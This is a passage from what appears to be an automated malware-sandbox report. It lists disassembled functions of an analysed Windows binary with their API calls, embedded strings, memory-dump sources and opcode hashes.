                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: \
                                                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                                                    • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                                                    • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                                                                    • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                                                    • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                                                    Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: \
                                                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                                                    • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                                                    • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                                                                    • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                                                    • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                                                                    Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                    • API String ID: 708495834-557222456
                                                                                                                                                    • Opcode ID: 5a63c4539c092d0bdeda202e320f68bf2a348f54d32cf71468f3c3e50633ce3c
                                                                                                                                                    • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                                                    • Opcode Fuzzy Hash: 5a63c4539c092d0bdeda202e320f68bf2a348f54d32cf71468f3c3e50633ce3c
                                                                                                                                                    • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                                                    Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                                                      • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                                                      • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                                                      • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                                                      • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                    • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                    • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                                                    • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                    • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                                                    Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: \$]$h
                                                                                                                                                    • API String ID: 4104443479-3262404753
                                                                                                                                                    • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                                    • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                                                                    • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                                    • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                                                                    Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                    • String ID: <$@
                                                                                                                                                    • API String ID: 2417854910-1426351568
                                                                                                                                                    • Opcode ID: c74d9848bc40b82e3fbf7b03d3cfd3af39385c8d101f10b5b521061fd4332237
                                                                                                                                                    • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                                                    • Opcode Fuzzy Hash: c74d9848bc40b82e3fbf7b03d3cfd3af39385c8d101f10b5b521061fd4332237
                                                                                                                                                    • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                                                    Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3705125965-3916222277
                                                                                                                                                    • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                                    • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                                                    • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                                    • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                                                    Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                                                    • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                                                    • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                                                    • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                                    • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                                                    • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                                    • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                                                    Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                    • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                                    • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                                                    • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                                    • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                                                    Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DestroyWindow
                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                    • API String ID: 3375834691-2298589950
                                                                                                                                                    • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                    • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                                                    • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                    • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                                                    Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: $<
                                                                                                                                                    • API String ID: 4104443479-428540627
                                                                                                                                                    • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                                    • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                                                                    • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                                    • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                                                                    Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                    • String ID: \VH
                                                                                                                                                    • API String ID: 1682464887-234962358
                                                                                                                                                    • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                                    • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                                                    • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                                    • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                                                    Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                    • String ID: \VH
                                                                                                                                                    • API String ID: 1682464887-234962358
                                                                                                                                                    • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                    • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                                                    • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                    • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                                                    Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
